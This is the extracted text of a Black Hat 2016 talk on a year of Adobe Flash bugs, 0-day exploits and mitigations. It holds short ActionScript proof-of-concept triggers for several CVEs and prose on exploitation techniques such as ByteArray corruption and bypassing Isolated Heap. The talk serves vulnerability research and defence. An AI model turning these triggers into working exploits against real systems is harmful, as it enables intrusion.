SlideShare a Scribd company logo

The year in Flash

Priyanka Aash
Priyanka Aash

"Adobe Flash continues to be a popular target for attackers in the wild. As an increasing number of bug fixes and mitigations are implemented, increasingly complex vulnerabilities and exploits are coming to light. This talk describes notable vulnerabilities and exploits that have been discovered in Flash in the past year. It will start with an overview of the attack surface of Flash, and then discuss how the most common types of vulnerabilities work. It will then go through the year with regards to bugs, exploits and mitigations. It will end with a discussion of the future of Flash attacks: likely areas for new bugs, and the impact of existing mitigations." (Source: Black Hat USA 2016, Las Vegas)

Technology
1 of 60
Download to read offline
The Year In Flash The year in Flash bugs, exploits and mitigations Natalie Silvanovich @natashenka
About me ● Natalie Silvanovich AKA natashenka AKA Flashtasha ● Project Zero member ● Previously did mobile security on Android and BlackBerry ● Flash enthusiast ● Reporter of ⅓ of Flash vulnerabilities
My goal
My goal ● Bug finding is my top priority ○ Mostly code review ○ Some fuzzing (with Mateusz Jurczyk AKA j00ru) ○ 1 bug per day -> 1 bug per week ○ Flash bugs stay gone ● Analyze external bugs and exploits
My goal ● Occasionally exploit bugs to answer questions ○ Is exploitation possible? ○ Is exploitation reliable? ○ How does X impact exploitability ● Work on mitigations (with James Forshaw and Mark Brand)
This talk ● Attack surface ● The year in Flash ○ New bugs and bug classes ○ 0-days, 1-days and other exploits ○ Mitigations ● The future?
Flash is ... ● AS2 -- ActionScript 2 ○ Interpreted legacy Flash Scripts with own VM ○ Reduced API set ○ Generally more bugs with lower exploitability ○ Blurry boundaries between VM and APIs
Flash is ... ● AS3 -- ActionScript 3 ○ Modern VM with JIT and interpreter ■ Extendible ■ GC Heap / Fixed Heap ■ Optimized for Flash ○ Open source VM ○ Open and closed source APIs ○ Bugs are less dense but more exploitable
Flash is ... ● Anticorpus ○ Functionality outside of script ○ MP4 parser, zlib, regex, image decoders, etc
Warning
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec Jan Feb Timeline
July 2015 ● Large update (36 bugs) ● Hacking Team dump ● Mitigations
July 2015 ● Hacking Team dump contained two 0-days and two fixed bugs ○ ByteArray/OpaqueBackground -- 0-day UaFs due to valueOf redefinition (CVE-2015-0349 and CVE-2015-05122) ○ ConvolutionFilter issue shown earlier (CVE-2015-3039/CVE-2015-0349) ○ Integer overflow in Function.apply -- reported via Chromium VRP before use (CVE-2015-0387) ○ NULL pointer in BitmapData, not exploitable (CVE-2015-05123)
CVE-2015-3039 ● Redefinition issue in ConvolutionFilter (also reported by bilou) ● AS2 allows any method to be redefined in script (monkey-patching) ● Generally native methods accept any type and convert objects with valueOf, toString, object constructor, etc.
CVE-2015-3039 ConvolutionFilter float* matrix ... var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } { valueOf : ts } var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } [{ valueOf : ts }] var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } float* [] var filter = new ConvolutionFilter(...); var n = { valueOf : ts }; var a = []; a[0] = n; filter.matrix = a; function ts(){ filter.matrix = [1]; } float* [] float* []float* [] 1.0 float* [] 1.0
July 2015 ● valueOf/toString bugs receive increased attention ○ Many similar bugs reported in next few months ○ Adobe starts efforts to pre-emptively fix similar bugs ● 33 bugs in regular update ● Vector mitigations implemented
Vector Mitigation ● Adds checksums to Vectors that are checked before doing sensitive functions ● Some Vectors are also on their own heap page ● Reduced the reusability of exploit code ● Generally increases the quality of bug needed for an exploit ● Substitution of ByteArray or BitmapData is possible, but not as good "I don't afraid Adobe analysts at all" -- Vitaly Toropov
CVE-2015-3130 ● Redefinition issue involving valueOf
CVE-2015-3130 var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } [] [{name: "john", city: "omaha"}, {name: "bob", city: "omaha"}] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } [{name: "john", city: "omaha"}, {name: "bob", city: "omaha"}, {valueOf : gl}] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } int length = array->getLength(); if (array->getLength() == 0){ return; } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } char** s = new char*[array->getLength()] var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } var s = 1; var rec_array:Array = new Array(); rec_array.push({name: "john", city: "omaha"}); rec_array.push({name: "bob", city: "omaha"}); rec_array.length = {valueOf : gl}; rec_array.sortOn(["name", "city"]); function gl(){ if(s< 3){ s++; return 100000; }else{ return 2; } } memcpy(s, array->items, length);
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec Jan Feb Timeline
August 2016 ● Many more bugs similar to HT bugs ● MC UaFs pour in
CVE-2015-5550 (MovieClip UaFs) ● Very common AS2 bug, 100+ reported this year ○ Small variety of freed object ● Also works with TextFields ● Root cause is that display fields are freed outside of garbage collection ○ Always, for real, even if there are references (in AS2)
CVE-2015-5550 (MovieClip UaFs) ● Happens when function parameters are converted after local variables are initialized, but before they are used ● Fixed by enforcing convert -> intialize -> use order
CVE-2015-5550 (MovieClip UaFs) var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } AS2 ScriptObject void* native_data void* destoy_func table* properties ... MovieClip ... var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; } SO *s = GetObject() MC *m = native_data[10]; var clip1 = this.createEmptyMovieClip ("clip1", 1); var clip2 = this.createEmptyMovieClip ("clip2", 2); var n = {toString: func}; clip1.swapDepths(n); function func(){ clip1.removeMovieClip(); return "clip2"; }
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec Jan Feb Timeline
September/October 2015 ● 23 bugs in September updates and 20 in October ○ Mostly UaFs and other redefinition bugs ● 0-day immediately after October update (reported by TrendMicro, NATO targets)
CVE-2015-7645 ● Reported two weeks before it was found in the wild ● Type confusion in serializations, due to weird AVM behaviour ● Two other variants also reported and fixed in emergency patch ● None of these bugs compile
CVE-2015-7645 From the AVM: // In theory we should reject duplicate slots here; // in practice we don't, as it causes problems with some existing content //if (basetb->findBinding(name, ns) != BIND_NONE) // toplevel->throwVerifyError(kIllegalOverrideError, toplevel->core()- >toErrorString(qn), toplevel->core()->toErrorString(this)); tl;dr a method can be overridden by a var Most natives don’t make assumptions, but some do. Especially interfaces.
CVE-2015-7645 class superclass{ … public function writeExternal(){ return 1; } } class subclass extends superclass{ public var writeExternal:uint = 7; ... }
CVE-2015-7645 From the AVM: and later: Multiname mn(core->getPublicNamespace(t->pool), core->internConstantStringLatin1(kWriteExternal)); m_functionBinding = toplevel->getBinding(t, &mn); MethodEnv* method = obj->vtable->methods[AvmCore::bindingToMethodId(info->get_functionBinding())]; method->coerceEnter(argc, argv);
How was this bug exploited? ● Traits property array is variable-sized ● Corrupted ByteArray to get R/W access to entire memory space
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec Jan Feb Timeline
November and December 2015 ● Huge Dec update, 79 bugs, mostly MC UaF ○ Structural changes to AS2 to make broad fixes ● New mitigations ○ Checksumming on ByteArray ○ Isolated Heap ○ NOP slide mitigations ● Exploit kit 1-day and 0-day
CVE-2015-8446 ● 1-day in Angler ● Similar to CVE-2015-5560 ● Integer overflow in ID3 allocation ○ Controllable size ○ Controllable overwrite ● Exploited using BitmapData
CVE-2015-8651 ● Integer overflow leading to heap overflow in JIT (reported by Huawei)
CVE-2015-8651 ● SWF contained two exploits ○ Typical vector exploit ○ Post Isolated Heap exploit including such elements as ■ Long if statements nested almost 100 times ■ Using both a media file and an image to fill heap slots at different points in the exploit ■ Triggering the bug ~600 times ■ Final results was memory space access via ByteArray
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline
February 2016 ● 22 bugs fixed ○ UaF straglers ○ Fuzz bugs, mostly media ○ Exception-related bugs
CVE-2016-0985 ● Unusual type confusion in AS3 ● Occurs due to catching an exception ○ Should have been fatal error
CVE-2016-0985 try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } Assets 0001 : myFont (type font) 0002 : myVideo (type video) FFF7 : myFont1 (type font) ... FFF7 : emptyTxt (type text) try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } MovieObject text* textAsset ... try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); } Assets 0001 : myFont (type font) 0002 : myVideo (type video) FFF7 : myFont1 (type text) ... FFF7 : emptyTxt (type text) try{ var t = new TextField(); } catch(e:Error){ var t2 = new TextField(); }
CVE-2016-0984 ● Read-only UaF in Sound class ● Exception-related
CVE-2016-0984 var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); Sound char* m_pcm ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); a b c ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); a b c ... var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0); var s = new Sound(); var b = new ByteArray(); // 1000 bytes s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); // size 2 try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){} s.extract(b, 1, 0);
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar CVE-2016-1019 CVE-2016-1010
March 2016 ● 22 bugs fixed ○ More fuzz bugs ■ Exploited one ○ UaFs ● pwn2own ○ 4 MC UaFs, one parsing bug in JPG ● 0-day ○ Overflow in Bitmap in platform-specific code
CVE-2016-0998 ● Exploitable fuzz bug ● Caused by UaF check ● Required ASLR bypass ● Got around IsoHeap with JIT pages
CVE-2016-0998 var o = {}; o.unwatch(); void* args = alloca(numArgs); … convertToString(args[0])
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 CVE-2016-1010
April 2016 ● 24 bugs fixed ○ Fuzzed images ○ The UaFs continue ● 0-day ○ Reported by TrendMicro in Magnitude EK ○ Type confusion in FileReference ○ Did not work on current mitigation set (0 on free)
CVE-2016-1019 ● 0-day vulnerability ● Reported some variants ● Type confusion in AS2
CVE-2016-1019 AS2 ScriptObject void* native_data Type type table* properties ... FileReference char* some_prop ... var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } AS2 ScriptObject void* native_data Type type = TF table* properties ... var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } var o = { toString : f }; var t = new TextField(o); function f(){ var fr = FileReference fr.call(this); } AS2 ScriptObject void* native_data Type type = FR table* properties ... TextField int other_prop ...
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 May CVE-2016-4117
July 2015 Sep CVE-2015-5119 CVE-2015-5122 CVE-2015-5123 APSA15-03 Aug Hacking Team Oct Nov Dec CVE-2015-8651 Jan Feb Timeline Mar Apr CVE-2016-1019 May CVE-2016-4117 Jun CVE-2016-4171
June 2016 ● 36 bugs fixed ○ MC UaFs (echo from pwn2own) ● 0-day ○ Reported by Kaspersky ○ OOB memory access in open source parser
CVE-2016-4171 void AbcParser::parseExecPolicyAttributes(const uint8_t* metadata, MethodInfo* m) { ... for (int q = 0; q < values_count; ++q) { Stringp key = pool->getString(readU30(p)); Stringp val = pool->getString(readU30(p));
CVE-2016-4171 Stringp PoolObject::getString(int32_t index) const { ConstantStringData* dataP = _abcStrings->data + index; if (dataP->abcPtr >= _abcStringStart && dataP->abcPtr < _abcStringEnd) { uint32_t len = AvmCore::readU32(dataP->abcPtr); Stringp s = core->internStringUTF8((const char*) dataP- >abcPtr, len, true, false); s->Stick(); dataP->abcPtr = NULL WBRC(core->gc, _abcStrings, &dataP->str, s); } return dataP->str; }
Conclusions ● Finding bugs in Flash is generally getting harder ○ 1 bug per day versus 1 per week ● Certain bug classes are drying up, but others are taking their places ● Flash mitigations are making it more difficult to exploit bugs, especially with low-quality bugs
The Future (What’s left?) ● MC UaFs (and AS2) probably still exist, but getting hard to exploit ○ Eventually similar bugs will have marginal utility ○ Display UaFs in AS3? ● Redefinition bugs are no longer ‘deep’ ● More AS3 bugs?
The Future (What’s left?) ● More anticorpus bugs / use of anti-corpus? ○ Media (MP4, FLV) ● Open source AVM? ● Platform-specific code ● Flash deprecation ○ Browsers?
Thank You ● Adobe
Questions? http://googleprojectzero.blogspot.com/ @natashenka natalie@natashenka.ca

Recommended

Weaponizing data science for social engineering: automate E2E spear phishing ...
Weaponizing data science for social engineering: automate E2E spear phishing ...Weaponizing data science for social engineering: automate E2E spear phishing ...
Weaponizing data science for social engineering: automate E2E spear phishing ...Priyanka Aash
 
RuchikaSalve_Resume
RuchikaSalve_ResumeRuchikaSalve_Resume
RuchikaSalve_ResumeRuchika Salve
 
Corley cloud angular in cloud
Corley cloud angular in cloudCorley cloud angular in cloud
Corley cloud angular in cloudCorley S.r.l.
 
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical Device
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical DeviceWireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical Device
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical DevicePriyanka Aash
 
Bad for Enterprise: Attacking BYOD enterprise mobility security solutions
Bad for Enterprise: Attacking BYOD enterprise mobility security solutionsBad for Enterprise: Attacking BYOD enterprise mobility security solutions
Bad for Enterprise: Attacking BYOD enterprise mobility security solutionsPriyanka Aash
 
Applied Machine learning for data exfiltration and other fun topics
Applied Machine learning for data exfiltration and other fun topicsApplied Machine learning for data exfiltration and other fun topics
Applied Machine learning for data exfiltration and other fun topicsPriyanka Aash
 
Skeletal System Outline
Skeletal System OutlineSkeletal System Outline
Skeletal System OutlineSam Wais
 
Ferdinand marcos
Ferdinand marcosFerdinand marcos
Ferdinand marcosLisa Mae Cugal
 

Recommended

Weaponizing data science for social engineering: automate E2E spear phishing ...
Weaponizing data science for social engineering: automate E2E spear phishing ...Weaponizing data science for social engineering: automate E2E spear phishing ...
Weaponizing data science for social engineering: automate E2E spear phishing ...Priyanka Aash
 
RuchikaSalve_Resume
RuchikaSalve_ResumeRuchikaSalve_Resume
RuchikaSalve_ResumeRuchika Salve
 
Corley cloud angular in cloud
Corley cloud angular in cloudCorley cloud angular in cloud
Corley cloud angular in cloudCorley S.r.l.
 
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical Device
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical DeviceWireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical Device
Wireless Infusion Pumps: Securing Hospitals’ Most Ubiquitous Medical DevicePriyanka Aash
 
Bad for Enterprise: Attacking BYOD enterprise mobility security solutions
Bad for Enterprise: Attacking BYOD enterprise mobility security solutionsBad for Enterprise: Attacking BYOD enterprise mobility security solutions
Bad for Enterprise: Attacking BYOD enterprise mobility security solutionsPriyanka Aash
 
Applied Machine learning for data exfiltration and other fun topics
Applied Machine learning for data exfiltration and other fun topicsApplied Machine learning for data exfiltration and other fun topics
Applied Machine learning for data exfiltration and other fun topicsPriyanka Aash
 
Skeletal System Outline
Skeletal System OutlineSkeletal System Outline
Skeletal System OutlineSam Wais
 
Ferdinand marcos
Ferdinand marcosFerdinand marcos
Ferdinand marcosLisa Mae Cugal
 
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...Sian Joel-Edgar
 
TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!Alessandro Giorgetti
 
The critical period hypothesis
The critical period hypothesisThe critical period hypothesis
The critical period hypothesisSukitaaj1990
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...Priyanka Aash
 
TypeScript Presentation
TypeScript PresentationTypeScript Presentation
TypeScript PresentationPatrick John Pacaña
 
Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...Amazon Web Services
 
Term sheet and valuation
Term sheet and valuationTerm sheet and valuation
Term sheet and valuationBlaz Kos
 
Unit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of DiscourseUnit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of DiscourseAshwag Al Hamid
 
Semantics
SemanticsSemantics
Semanticsamna-shahid
 
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 

More Related Content

Viewers also liked

Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...Sian Joel-Edgar
 
TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!Alessandro Giorgetti
 
The critical period hypothesis
The critical period hypothesisThe critical period hypothesis
The critical period hypothesisSukitaaj1990
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...Priyanka Aash
 
Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...Amazon Web Services
 
Term sheet and valuation
Term sheet and valuationTerm sheet and valuation
Term sheet and valuationBlaz Kos
 
Unit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of DiscourseUnit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of DiscourseAshwag Al Hamid
 

Viewers also liked (9)

Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
Time is of the essence: Value Stream Mapping a National Health Service (NHS) ...
 
TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!TypeScript . the JavaScript developer best friend!
TypeScript . the JavaScript developer best friend!
 
The critical period hypothesis
The critical period hypothesisThe critical period hypothesis
The critical period hypothesis
 
The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...The Art of defence: How vulnerabilites help shape security features and mitig...
The Art of defence: How vulnerabilites help shape security features and mitig...
 
TypeScript Presentation
TypeScript PresentationTypeScript Presentation
TypeScript Presentation
 
Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...Cloud Data Management at Australia's Largest Software Company -Session Sponso...
Cloud Data Management at Australia's Largest Software Company -Session Sponso...
 
Term sheet and valuation
Term sheet and valuationTerm sheet and valuation
Term sheet and valuation
 
Unit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of DiscourseUnit 6 - Predicates, Referring Expressions, and Universe of Discourse
Unit 6 - Predicates, Referring Expressions, and Universe of Discourse
 
Semantics
SemanticsSemantics
Semantics
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
